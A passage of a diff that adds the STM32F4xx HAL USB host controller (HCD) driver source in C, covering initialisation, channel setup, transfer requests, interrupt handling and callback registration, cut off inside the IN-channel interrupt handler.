+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +#ifdef HAL_HCD_MODULE_ENABLED +#if defined (USB_OTG_FS) || defined (USB_OTG_HS) + +/** @defgroup HCD HCD + * @brief HCD HAL module driver + * @{ + */ + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup HCD_Private_Functions HCD Private Functions + * @{ + */ +static void HCD_HC_IN_IRQHandler(HCD_HandleTypeDef *hhcd, uint8_t chnum); +static void HCD_HC_OUT_IRQHandler(HCD_HandleTypeDef *hhcd, uint8_t chnum); +static void HCD_RXQLVL_IRQHandler(HCD_HandleTypeDef *hhcd); +static void HCD_Port_IRQHandler(HCD_HandleTypeDef *hhcd); +/** + * @} + */ + +/* Exported functions --------------------------------------------------------*/ +/** @defgroup HCD_Exported_Functions HCD Exported Functions + * @{ + */ + +/** @defgroup HCD_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * +@verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This section provides functions allowing to: + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the host driver. + * @param hhcd HCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_Init(HCD_HandleTypeDef *hhcd) +{ + USB_OTG_GlobalTypeDef *USBx; + + /* Check the HCD handle allocation */ + if (hhcd == NULL) + { + return HAL_ERROR; + } + + /* Check the parameters */ + assert_param(IS_HCD_ALL_INSTANCE(hhcd->Instance)); + + USBx = hhcd->Instance; + + if (hhcd->State == HAL_HCD_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + hhcd->Lock = HAL_UNLOCKED; + +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + hhcd->SOFCallback = HAL_HCD_SOF_Callback; + hhcd->ConnectCallback = HAL_HCD_Connect_Callback; + hhcd->DisconnectCallback = HAL_HCD_Disconnect_Callback; + hhcd->PortEnabledCallback = HAL_HCD_PortEnabled_Callback; + hhcd->PortDisabledCallback = HAL_HCD_PortDisabled_Callback; + hhcd->HC_NotifyURBChangeCallback = HAL_HCD_HC_NotifyURBChange_Callback; + + if (hhcd->MspInitCallback == NULL) + { + hhcd->MspInitCallback = HAL_HCD_MspInit; + } + + /* Init the low level hardware */ + hhcd->MspInitCallback(hhcd); +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC... */ + HAL_HCD_MspInit(hhcd); +#endif /* (USE_HAL_HCD_REGISTER_CALLBACKS) */ + } + + hhcd->State = HAL_HCD_STATE_BUSY; + + /* Disable DMA mode for FS instance */ + if ((USBx->CID & (0x1U << 8)) == 0U) + { + hhcd->Init.dma_enable = 0U; + } + + /* Disable the Interrupts */ + __HAL_HCD_DISABLE(hhcd); + + /* Init the Core (common init.) */ + (void)USB_CoreInit(hhcd->Instance, hhcd->Init); + + /* Force Host Mode*/ + (void)USB_SetCurrentMode(hhcd->Instance, USB_HOST_MODE); + + /* Init Host */ + (void)USB_HostInit(hhcd->Instance, hhcd->Init); + + hhcd->State = HAL_HCD_STATE_READY; + + return HAL_OK; +} + +/** + * @brief Initialize a host channel. + * @param hhcd HCD handle + * @param ch_num Channel number. + * This parameter can be a value from 1 to 15 + * @param epnum Endpoint number. + * This parameter can be a value from 1 to 15 + * @param dev_address Current device address + * This parameter can be a value from 0 to 255 + * @param speed Current device speed. + * This parameter can be one of these values: + * HCD_DEVICE_SPEED_HIGH: High speed mode, + * HCD_DEVICE_SPEED_FULL: Full speed mode, + * HCD_DEVICE_SPEED_LOW: Low speed mode + * @param ep_type Endpoint Type. + * This parameter can be one of these values: + * EP_TYPE_CTRL: Control type, + * EP_TYPE_ISOC: Isochronous type, + * EP_TYPE_BULK: Bulk type, + * EP_TYPE_INTR: Interrupt type + * @param mps Max Packet Size. + * This parameter can be a value from 0 to32K + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_HC_Init(HCD_HandleTypeDef *hhcd, + uint8_t ch_num, + uint8_t epnum, + uint8_t dev_address, + uint8_t speed, + uint8_t ep_type, + uint16_t mps) +{ + HAL_StatusTypeDef status; + + __HAL_LOCK(hhcd); + hhcd->hc[ch_num].do_ping = 0U; + hhcd->hc[ch_num].dev_addr = dev_address; + hhcd->hc[ch_num].max_packet = mps; + hhcd->hc[ch_num].ch_num = ch_num; + hhcd->hc[ch_num].ep_type = ep_type; + hhcd->hc[ch_num].ep_num = epnum & 0x7FU; + + if ((epnum & 0x80U) == 0x80U) + { + hhcd->hc[ch_num].ep_is_in = 1U; + } + else + { + hhcd->hc[ch_num].ep_is_in = 0U; + } + + hhcd->hc[ch_num].speed = speed; + + status = USB_HC_Init(hhcd->Instance, + ch_num, + epnum, + dev_address, + speed, + ep_type, + mps); + __HAL_UNLOCK(hhcd); + + return status; +} + +/** + * @brief Halt a host channel. + * @param hhcd HCD handle + * @param ch_num Channel number. + * This parameter can be a value from 1 to 15 + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_HC_Halt(HCD_HandleTypeDef *hhcd, uint8_t ch_num) +{ + HAL_StatusTypeDef status = HAL_OK; + + __HAL_LOCK(hhcd); + (void)USB_HC_Halt(hhcd->Instance, (uint8_t)ch_num); + __HAL_UNLOCK(hhcd); + + return status; +} + +/** + * @brief DeInitialize the host driver. + * @param hhcd HCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_DeInit(HCD_HandleTypeDef *hhcd) +{ + /* Check the HCD handle allocation */ + if (hhcd == NULL) + { + return HAL_ERROR; + } + + hhcd->State = HAL_HCD_STATE_BUSY; + +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + if (hhcd->MspDeInitCallback == NULL) + { + hhcd->MspDeInitCallback = HAL_HCD_MspDeInit; /* Legacy weak MspDeInit */ + } + + /* DeInit the low level hardware */ + hhcd->MspDeInitCallback(hhcd); +#else + /* DeInit the low level hardware: CLOCK, NVIC.*/ + HAL_HCD_MspDeInit(hhcd); +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + + __HAL_HCD_DISABLE(hhcd); + + hhcd->State = HAL_HCD_STATE_RESET; + + return HAL_OK; +} + +/** + * @brief Initialize the HCD MSP. + * @param hhcd HCD handle + * @retval None + */ +__weak void HAL_HCD_MspInit(HCD_HandleTypeDef *hhcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_HCD_MspInit could be implemented in the user file + */ +} + +/** + * @brief DeInitialize the HCD MSP. + * @param hhcd HCD handle + * @retval None + */ +__weak void HAL_HCD_MspDeInit(HCD_HandleTypeDef *hhcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_HCD_MspDeInit could be implemented in the user file + */ +} + +/** + * @} + */ + +/** @defgroup HCD_Exported_Functions_Group2 Input and Output operation functions + * @brief HCD IO operation functions + * +@verbatim + =============================================================================== + ##### IO operation functions ##### + =============================================================================== + [..] This subsection provides a set of functions allowing to manage the USB Host Data + Transfer + +@endverbatim + * @{ + */ + +/** + * @brief Submit a new URB for processing. + * @param hhcd HCD handle + * @param ch_num Channel number. + * This parameter can be a value from 1 to 15 + * @param direction Channel number. + * This parameter can be one of these values: + * 0 : Output / 1 : Input + * @param ep_type Endpoint Type. + * This parameter can be one of these values: + * EP_TYPE_CTRL: Control type/ + * EP_TYPE_ISOC: Isochronous type/ + * EP_TYPE_BULK: Bulk type/ + * EP_TYPE_INTR: Interrupt type/ + * @param token Endpoint Type. + * This parameter can be one of these values: + * 0: HC_PID_SETUP / 1: HC_PID_DATA1 + * @param pbuff pointer to URB data + * @param length Length of URB data + * @param do_ping activate do ping protocol (for high speed only). + * This parameter can be one of these values: + * 0 : do ping inactive / 1 : do ping active + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_HC_SubmitRequest(HCD_HandleTypeDef *hhcd, + uint8_t ch_num, + uint8_t direction, + uint8_t ep_type, + uint8_t token, + uint8_t *pbuff, + uint16_t length, + uint8_t do_ping) +{ + hhcd->hc[ch_num].ep_is_in = direction; + hhcd->hc[ch_num].ep_type = ep_type; + + if (token == 0U) + { + hhcd->hc[ch_num].data_pid = HC_PID_SETUP; + hhcd->hc[ch_num].do_ping = do_ping; + } + else + { + hhcd->hc[ch_num].data_pid = HC_PID_DATA1; + } + + /* Manage Data Toggle */ + switch (ep_type) + { + case EP_TYPE_CTRL: + if ((token == 1U) && (direction == 0U)) /*send data */ + { + if (length == 0U) + { + /* For Status OUT stage, Length==0, Status Out PID = 1 */ + hhcd->hc[ch_num].toggle_out = 1U; + } + + /* Set the Data Toggle bit as per the Flag */ + if (hhcd->hc[ch_num].toggle_out == 0U) + { + /* Put the PID 0 */ + hhcd->hc[ch_num].data_pid = HC_PID_DATA0; + } + else + { + /* Put the PID 1 */ + hhcd->hc[ch_num].data_pid = HC_PID_DATA1; + } + } + break; + + case EP_TYPE_BULK: + if (direction == 0U) + { + /* Set the Data Toggle bit as per the Flag */ + if (hhcd->hc[ch_num].toggle_out == 0U) + { + /* Put the PID 0 */ + hhcd->hc[ch_num].data_pid = HC_PID_DATA0; + } + else + { + /* Put the PID 1 */ + hhcd->hc[ch_num].data_pid = HC_PID_DATA1; + } + } + else + { + if (hhcd->hc[ch_num].toggle_in == 0U) + { + hhcd->hc[ch_num].data_pid = HC_PID_DATA0; + } + else + { + hhcd->hc[ch_num].data_pid = HC_PID_DATA1; + } + } + + break; + case EP_TYPE_INTR: + if (direction == 0U) + { + /* Set the Data Toggle bit as per the Flag */ + if (hhcd->hc[ch_num].toggle_out == 0U) + { + /* Put the PID 0 */ + hhcd->hc[ch_num].data_pid = HC_PID_DATA0; + } + else + { + /* Put the PID 1 */ + hhcd->hc[ch_num].data_pid = HC_PID_DATA1; + } + } + else + { + if (hhcd->hc[ch_num].toggle_in == 0U) + { + hhcd->hc[ch_num].data_pid = HC_PID_DATA0; + } + else + { + hhcd->hc[ch_num].data_pid = HC_PID_DATA1; + } + } + break; + + case EP_TYPE_ISOC: + hhcd->hc[ch_num].data_pid = HC_PID_DATA0; + break; + + default: + break; + } + + hhcd->hc[ch_num].xfer_buff = pbuff; + hhcd->hc[ch_num].xfer_len = length; + hhcd->hc[ch_num].urb_state = URB_IDLE; + hhcd->hc[ch_num].xfer_count = 0U; + hhcd->hc[ch_num].ch_num = ch_num; + hhcd->hc[ch_num].state = HC_IDLE; + + return USB_HC_StartXfer(hhcd->Instance, &hhcd->hc[ch_num], (uint8_t)hhcd->Init.dma_enable); +} + +/** + * @brief Handle HCD interrupt request. + * @param hhcd HCD handle + * @retval None + */ +void HAL_HCD_IRQHandler(HCD_HandleTypeDef *hhcd) +{ + USB_OTG_GlobalTypeDef *USBx = hhcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t i; + uint32_t interrupt; + + /* Ensure that we are in device mode */ + if (USB_GetMode(hhcd->Instance) == USB_OTG_MODE_HOST) + { + /* Avoid spurious interrupt */ + if (__HAL_HCD_IS_INVALID_INTERRUPT(hhcd)) + { + return; + } + + if (__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_PXFR_INCOMPISOOUT)) + { + /* Incorrect mode, acknowledge the interrupt */ + __HAL_HCD_CLEAR_FLAG(hhcd, USB_OTG_GINTSTS_PXFR_INCOMPISOOUT); + } + + if (__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_IISOIXFR)) + { + /* Incorrect mode, acknowledge the interrupt */ + __HAL_HCD_CLEAR_FLAG(hhcd, USB_OTG_GINTSTS_IISOIXFR); + } + + if (__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_PTXFE)) + { + /* Incorrect mode, acknowledge the interrupt */ + __HAL_HCD_CLEAR_FLAG(hhcd, USB_OTG_GINTSTS_PTXFE); + } + + if (__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_MMIS)) + { + /* Incorrect mode, acknowledge the interrupt */ + __HAL_HCD_CLEAR_FLAG(hhcd, USB_OTG_GINTSTS_MMIS); + } + + /* Handle Host Disconnect Interrupts */ + if (__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_DISCINT)) + { + __HAL_HCD_CLEAR_FLAG(hhcd, USB_OTG_GINTSTS_DISCINT); + + if ((USBx_HPRT0 & USB_OTG_HPRT_PCSTS) == 0U) + { + /* Flush USB Fifo */ + (void)USB_FlushTxFifo(USBx, 0x10U); + (void)USB_FlushRxFifo(USBx); + + /* Restore FS Clock */ + (void)USB_InitFSLSPClkSel(hhcd->Instance, HCFG_48_MHZ); + + /* Handle Host Port Disconnect Interrupt */ +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + hhcd->DisconnectCallback(hhcd); +#else + HAL_HCD_Disconnect_Callback(hhcd); +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + } + } + + /* Handle Host Port Interrupts */ + if (__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_HPRTINT)) + { + HCD_Port_IRQHandler(hhcd); + } + + /* Handle Host SOF Interrupt */ + if (__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_SOF)) + { +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) + hhcd->SOFCallback(hhcd); +#else + HAL_HCD_SOF_Callback(hhcd); +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + + __HAL_HCD_CLEAR_FLAG(hhcd, USB_OTG_GINTSTS_SOF); + } + + /* Handle Rx Queue Level Interrupts */ + if ((__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_RXFLVL)) != 0U) + { + USB_MASK_INTERRUPT(hhcd->Instance, USB_OTG_GINTSTS_RXFLVL); + + HCD_RXQLVL_IRQHandler(hhcd); + + USB_UNMASK_INTERRUPT(hhcd->Instance, USB_OTG_GINTSTS_RXFLVL); + } + + /* Handle Host channel Interrupt */ + if (__HAL_HCD_GET_FLAG(hhcd, USB_OTG_GINTSTS_HCINT)) + { + interrupt = USB_HC_ReadInterrupt(hhcd->Instance); + for (i = 0U; i < hhcd->Init.Host_channels; i++) + { + if ((interrupt & (1UL << (i & 0xFU))) != 0U) + { + if ((USBx_HC(i)->HCCHAR & USB_OTG_HCCHAR_EPDIR) == USB_OTG_HCCHAR_EPDIR) + { + HCD_HC_IN_IRQHandler(hhcd, (uint8_t)i); + } + else + { + HCD_HC_OUT_IRQHandler(hhcd, (uint8_t)i); + } + } + } + __HAL_HCD_CLEAR_FLAG(hhcd, USB_OTG_GINTSTS_HCINT); + } + } +} + + +/** + * @brief Handles HCD Wakeup interrupt request. + * @param hhcd HCD handle + * @retval HAL status + */ +void HAL_HCD_WKUP_IRQHandler(HCD_HandleTypeDef *hhcd) +{ + UNUSED(hhcd); +} + + +/** + * @brief SOF callback. + * @param hhcd HCD handle + * @retval None + */ +__weak void HAL_HCD_SOF_Callback(HCD_HandleTypeDef *hhcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_HCD_SOF_Callback could be implemented in the user file + */ +} + +/** + * @brief Connection Event callback. + * @param hhcd HCD handle + * @retval None + */ +__weak void HAL_HCD_Connect_Callback(HCD_HandleTypeDef *hhcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_HCD_Connect_Callback could be implemented in the user file + */ +} + +/** + * @brief Disconnection Event callback. + * @param hhcd HCD handle + * @retval None + */ +__weak void HAL_HCD_Disconnect_Callback(HCD_HandleTypeDef *hhcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_HCD_Disconnect_Callback could be implemented in the user file + */ +} + +/** + * @brief Port Enabled Event callback. + * @param hhcd HCD handle + * @retval None + */ +__weak void HAL_HCD_PortEnabled_Callback(HCD_HandleTypeDef *hhcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_HCD_Disconnect_Callback could be implemented in the user file + */ +} + +/** + * @brief Port Disabled Event callback. + * @param hhcd HCD handle + * @retval None + */ +__weak void HAL_HCD_PortDisabled_Callback(HCD_HandleTypeDef *hhcd) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhcd); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_HCD_Disconnect_Callback could be implemented in the user file + */ +} + +/** + * @brief Notify URB state change callback. + * @param hhcd HCD handle + * @param chnum Channel number. + * This parameter can be a value from 1 to 15 + * @param urb_state: + * This parameter can be one of these values: + * URB_IDLE/ + * URB_DONE/ + * URB_NOTREADY/ + * URB_NYET/ + * URB_ERROR/ + * URB_STALL/ + * @retval None + */ +__weak void HAL_HCD_HC_NotifyURBChange_Callback(HCD_HandleTypeDef *hhcd, uint8_t chnum, HCD_URBStateTypeDef urb_state) +{ + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhcd); + UNUSED(chnum); + UNUSED(urb_state); + + /* NOTE : This function should not be modified, when the callback is needed, + the HAL_HCD_HC_NotifyURBChange_Callback could be implemented in the user file + */ +} + +#if (USE_HAL_HCD_REGISTER_CALLBACKS == 1U) +/** + * @brief Register a User USB HCD Callback + * To be used instead of the weak predefined callback + * @param hhcd USB HCD handle + * @param CallbackID ID of the callback to be registered + * This parameter can be one of the following values: + * @arg @ref HAL_HCD_SOF_CB_ID USB HCD SOF callback ID + * @arg @ref HAL_HCD_CONNECT_CB_ID USB HCD Connect callback ID + * @arg @ref HAL_HCD_DISCONNECT_CB_ID OTG HCD Disconnect callback ID + * @arg @ref HAL_HCD_PORT_ENABLED_CB_ID USB HCD Port Enable callback ID + * @arg @ref HAL_HCD_PORT_DISABLED_CB_ID USB HCD Port Disable callback ID + * @arg @ref HAL_HCD_MSPINIT_CB_ID MspDeInit callback ID + * @arg @ref HAL_HCD_MSPDEINIT_CB_ID MspDeInit callback ID + * @param pCallback pointer to the Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_RegisterCallback(HCD_HandleTypeDef *hhcd, + HAL_HCD_CallbackIDTypeDef CallbackID, + pHCD_CallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + return HAL_ERROR; + } + /* Process locked */ + __HAL_LOCK(hhcd); + + if (hhcd->State == HAL_HCD_STATE_READY) + { + switch (CallbackID) + { + case HAL_HCD_SOF_CB_ID : + hhcd->SOFCallback = pCallback; + break; + + case HAL_HCD_CONNECT_CB_ID : + hhcd->ConnectCallback = pCallback; + break; + + case HAL_HCD_DISCONNECT_CB_ID : + hhcd->DisconnectCallback = pCallback; + break; + + case HAL_HCD_PORT_ENABLED_CB_ID : + hhcd->PortEnabledCallback = pCallback; + break; + + case HAL_HCD_PORT_DISABLED_CB_ID : + hhcd->PortDisabledCallback = pCallback; + break; + + case HAL_HCD_MSPINIT_CB_ID : + hhcd->MspInitCallback = pCallback; + break; + + case HAL_HCD_MSPDEINIT_CB_ID : + hhcd->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hhcd->State == HAL_HCD_STATE_RESET) + { + switch (CallbackID) + { + case HAL_HCD_MSPINIT_CB_ID : + hhcd->MspInitCallback = pCallback; + break; + + case HAL_HCD_MSPDEINIT_CB_ID : + hhcd->MspDeInitCallback = pCallback; + break; + + default : + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hhcd); + return status; +} + +/** + * @brief Unregister an USB HCD Callback + * USB HCD callback is redirected to the weak predefined callback + * @param hhcd USB HCD handle + * @param CallbackID ID of the callback to be unregistered + * This parameter can be one of the following values: + * @arg @ref HAL_HCD_SOF_CB_ID USB HCD SOF callback ID + * @arg @ref HAL_HCD_CONNECT_CB_ID USB HCD Connect callback ID + * @arg @ref HAL_HCD_DISCONNECT_CB_ID OTG HCD Disconnect callback ID + * @arg @ref HAL_HCD_PORT_ENABLED_CB_ID USB HCD Port Enabled callback ID + * @arg @ref HAL_HCD_PORT_DISABLED_CB_ID USB HCD Port Disabled callback ID + * @arg @ref HAL_HCD_MSPINIT_CB_ID MspDeInit callback ID + * @arg @ref HAL_HCD_MSPDEINIT_CB_ID MspDeInit callback ID + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_UnRegisterCallback(HCD_HandleTypeDef *hhcd, HAL_HCD_CallbackIDTypeDef CallbackID) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hhcd); + + /* Setup Legacy weak Callbacks */ + if (hhcd->State == HAL_HCD_STATE_READY) + { + switch (CallbackID) + { + case HAL_HCD_SOF_CB_ID : + hhcd->SOFCallback = HAL_HCD_SOF_Callback; + break; + + case HAL_HCD_CONNECT_CB_ID : + hhcd->ConnectCallback = HAL_HCD_Connect_Callback; + break; + + case HAL_HCD_DISCONNECT_CB_ID : + hhcd->DisconnectCallback = HAL_HCD_Disconnect_Callback; + break; + + case HAL_HCD_PORT_ENABLED_CB_ID : + hhcd->PortEnabledCallback = HAL_HCD_PortEnabled_Callback; + break; + + case HAL_HCD_PORT_DISABLED_CB_ID : + hhcd->PortDisabledCallback = HAL_HCD_PortDisabled_Callback; + break; + + case HAL_HCD_MSPINIT_CB_ID : + hhcd->MspInitCallback = HAL_HCD_MspInit; + break; + + case HAL_HCD_MSPDEINIT_CB_ID : + hhcd->MspDeInitCallback = HAL_HCD_MspDeInit; + break; + + default : + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else if (hhcd->State == HAL_HCD_STATE_RESET) + { + switch (CallbackID) + { + case HAL_HCD_MSPINIT_CB_ID : + hhcd->MspInitCallback = HAL_HCD_MspInit; + break; + + case HAL_HCD_MSPDEINIT_CB_ID : + hhcd->MspDeInitCallback = HAL_HCD_MspDeInit; + break; + + default : + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + break; + } + } + else + { + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hhcd); + return status; +} + +/** + * @brief Register USB HCD Host Channel Notify URB Change Callback + * To be used instead of the weak HAL_HCD_HC_NotifyURBChange_Callback() predefined callback + * @param hhcd HCD handle + * @param pCallback pointer to the USB HCD Host Channel Notify URB Change Callback function + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_RegisterHC_NotifyURBChangeCallback(HCD_HandleTypeDef *hhcd, + pHCD_HC_NotifyURBChangeCallbackTypeDef pCallback) +{ + HAL_StatusTypeDef status = HAL_OK; + + if (pCallback == NULL) + { + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + + return HAL_ERROR; + } + + /* Process locked */ + __HAL_LOCK(hhcd); + + if (hhcd->State == HAL_HCD_STATE_READY) + { + hhcd->HC_NotifyURBChangeCallback = pCallback; + } + else + { + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hhcd); + + return status; +} + +/** + * @brief Unregister the USB HCD Host Channel Notify URB Change Callback + * USB HCD Host Channel Notify URB Change Callback is redirected + * to the weak HAL_HCD_HC_NotifyURBChange_Callback() predefined callback + * @param hhcd HCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_UnRegisterHC_NotifyURBChangeCallback(HCD_HandleTypeDef *hhcd) +{ + HAL_StatusTypeDef status = HAL_OK; + + /* Process locked */ + __HAL_LOCK(hhcd); + + if (hhcd->State == HAL_HCD_STATE_READY) + { + hhcd->HC_NotifyURBChangeCallback = HAL_HCD_HC_NotifyURBChange_Callback; /* Legacy weak DataOutStageCallback */ + } + else + { + /* Update the error code */ + hhcd->ErrorCode |= HAL_HCD_ERROR_INVALID_CALLBACK; + + /* Return error status */ + status = HAL_ERROR; + } + + /* Release Lock */ + __HAL_UNLOCK(hhcd); + + return status; +} +#endif /* USE_HAL_HCD_REGISTER_CALLBACKS */ + +/** + * @} + */ + +/** @defgroup HCD_Exported_Functions_Group3 Peripheral Control functions + * @brief Management functions + * +@verbatim + =============================================================================== + ##### Peripheral Control functions ##### + =============================================================================== + [..] + This subsection provides a set of functions allowing to control the HCD data + transfers. + +@endverbatim + * @{ + */ + +/** + * @brief Start the host driver. + * @param hhcd HCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_Start(HCD_HandleTypeDef *hhcd) +{ + __HAL_LOCK(hhcd); + /* Enable port power */ + (void)USB_DriveVbus(hhcd->Instance, 1U); + + /* Enable global interrupt */ + __HAL_HCD_ENABLE(hhcd); + __HAL_UNLOCK(hhcd); + + return HAL_OK; +} + +/** + * @brief Stop the host driver. + * @param hhcd HCD handle + * @retval HAL status + */ + +HAL_StatusTypeDef HAL_HCD_Stop(HCD_HandleTypeDef *hhcd) +{ + __HAL_LOCK(hhcd); + (void)USB_StopHost(hhcd->Instance); + __HAL_UNLOCK(hhcd); + + return HAL_OK; +} + +/** + * @brief Reset the host port. + * @param hhcd HCD handle + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HCD_ResetPort(HCD_HandleTypeDef *hhcd) +{ + return (USB_ResetPort(hhcd->Instance)); +} + +/** + * @} + */ + +/** @defgroup HCD_Exported_Functions_Group4 Peripheral State functions + * @brief Peripheral State functions + * +@verbatim + =============================================================================== + ##### Peripheral State functions ##### + =============================================================================== + [..] + This subsection permits to get in run-time the status of the peripheral + and the data flow. + +@endverbatim + * @{ + */ + +/** + * @brief Return the HCD handle state. + * @param hhcd HCD handle + * @retval HAL state + */ +HCD_StateTypeDef HAL_HCD_GetState(HCD_HandleTypeDef *hhcd) +{ + return hhcd->State; +} + +/** + * @brief Return URB state for a channel. + * @param hhcd HCD handle + * @param chnum Channel number. + * This parameter can be a value from 1 to 15 + * @retval URB state. + * This parameter can be one of these values: + * URB_IDLE/ + * URB_DONE/ + * URB_NOTREADY/ + * URB_NYET/ + * URB_ERROR/ + * URB_STALL + */ +HCD_URBStateTypeDef HAL_HCD_HC_GetURBState(HCD_HandleTypeDef *hhcd, uint8_t chnum) +{ + return hhcd->hc[chnum].urb_state; +} + + +/** + * @brief Return the last host transfer size. + * @param hhcd HCD handle + * @param chnum Channel number. + * This parameter can be a value from 1 to 15 + * @retval last transfer size in byte + */ +uint32_t HAL_HCD_HC_GetXferCount(HCD_HandleTypeDef *hhcd, uint8_t chnum) +{ + return hhcd->hc[chnum].xfer_count; +} + +/** + * @brief Return the Host Channel state. + * @param hhcd HCD handle + * @param chnum Channel number. + * This parameter can be a value from 1 to 15 + * @retval Host channel state + * This parameter can be one of these values: + * HC_IDLE/ + * HC_XFRC/ + * HC_HALTED/ + * HC_NYET/ + * HC_NAK/ + * HC_STALL/ + * HC_XACTERR/ + * HC_BBLERR/ + * HC_DATATGLERR + */ +HCD_HCStateTypeDef HAL_HCD_HC_GetState(HCD_HandleTypeDef *hhcd, uint8_t chnum) +{ + return hhcd->hc[chnum].state; +} + +/** + * @brief Return the current Host frame number. + * @param hhcd HCD handle + * @retval Current Host frame number + */ +uint32_t HAL_HCD_GetCurrentFrame(HCD_HandleTypeDef *hhcd) +{ + return (USB_GetCurrentFrame(hhcd->Instance)); +} + +/** + * @brief Return the Host enumeration speed. + * @param hhcd HCD handle + * @retval Enumeration speed + */ +uint32_t HAL_HCD_GetCurrentSpeed(HCD_HandleTypeDef *hhcd) +{ + return (USB_GetHostSpeed(hhcd->Instance)); +} + +/** + * @} + */ + +/** + * @} + */ + +/** @addtogroup HCD_Private_Functions + * @{ + */ +/** + * @brief Handle Host Channel IN interrupt requests. + * @param hhcd HCD handle + * @param chnum Channel number. + * This parameter can be a value from 1 to 15 + * @retval none + */ +static void HCD_HC_IN_IRQHandler(HCD_HandleTypeDef *hhcd, uint8_t chnum) +{ + USB_OTG_GlobalTypeDef *USBx = hhcd->Instance; + uint32_t USBx_BASE = (uint32_t)USBx; + uint32_t ch_num = (uint32_t)chnum; + + uint32_t tmpreg; + + if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_AHBERR) == USB_OTG_HCINT_AHBERR) + { + __HAL_HCD_CLEAR_HC_INT(ch_num, USB_OTG_HCINT_AHBERR); + __HAL_HCD_UNMASK_HALT_HC_INT(ch_num); + } + else if ((USBx_HC(ch_num)->HCINT & USB_OTG_HCINT_BBERR) == USB_OTG_HCINT_BBERR) + { + 